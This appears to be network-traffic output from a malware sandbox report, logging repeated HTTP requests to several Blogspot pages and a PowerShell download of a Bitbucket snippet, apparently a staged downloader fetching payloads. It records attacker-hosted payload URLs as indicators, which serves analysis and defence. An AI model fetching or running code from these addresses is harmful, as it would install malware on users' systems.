  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: accounts.google.com
  Cookie: __Host-GAPS=1:c9BBumwINGgbKZmhvCsmcJwIqGnQ7A:dvQQZbHicFDLQc5k

Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1 HTTP/1.1
  Accept: */*
  Referer: https://randikhanaekminar.blogspot.com/p/ayoola.html
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: www.blogger.com
  Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236

Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.google.com
  If-Modified-Since: Mon, 25 May 2020 08:30:00 GMT
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.google-analytics.com
  If-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMT
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
  Host: bitbucket.org
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1
  Accept: */*
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: backbones1234511a.blogspot.com

Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1
  Accept: */*
  Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: backbones1234511a.blogspot.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1
  Accept: */*
  Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive
  Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236

Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1
  Accept: */*
  Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive
  Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236

Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1
  Accept: */*
  Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: accounts.google.com
  Cookie: __Host-GAPS=1:6n9HeR7EpH_BLBfBK28oPhchLN3ckw:TftEdtH5NeRlJzNf

Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1
  Accept: */*
  Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: www.blogger.com
  Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236

Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
  Host: bitbucket.org
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.google.com
  If-Modified-Since: Mon, 25 May 2020 08:30:00 GMT
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.google-analytics.com
  If-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMT
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1
  Accept: */*
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: startthepartyup.blogspot.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1
  Accept: */*
  Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: startthepartyup.blogspot.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1
  Accept: */*
  Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive
  Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236

Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1
  Accept: */*
  Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive
  Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236

Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1
  Accept: */*
  Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: accounts.google.com
  Cookie: __Host-GAPS=1:-UtK03aR6xcHYC2IsubUGy9SL5c4yw:nFWAkb4XQpFiUmZt

Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1
  Accept: */*
  Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: www.blogger.com
  Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236

Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.google.com
  If-Modified-Since: Mon, 25 May 2020 08:30:00 GMT
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.google-analytics.com
  If-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMT
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:5Vg_RjDpt6AvPfyva6KZpJ4lF9qr6w:sp4m46I6qe_hSWA8
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: backbones1234511a.blogspot.com
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:Hmt6ODuT1T9rHnbQAYn_Kn4-RIPtxg:emLdUalzCJuXb2hK
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:bo4Rzlac7OC6SQzizPuNFmoxcxmpHg:LWMGlJqI2wYq8ec8
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
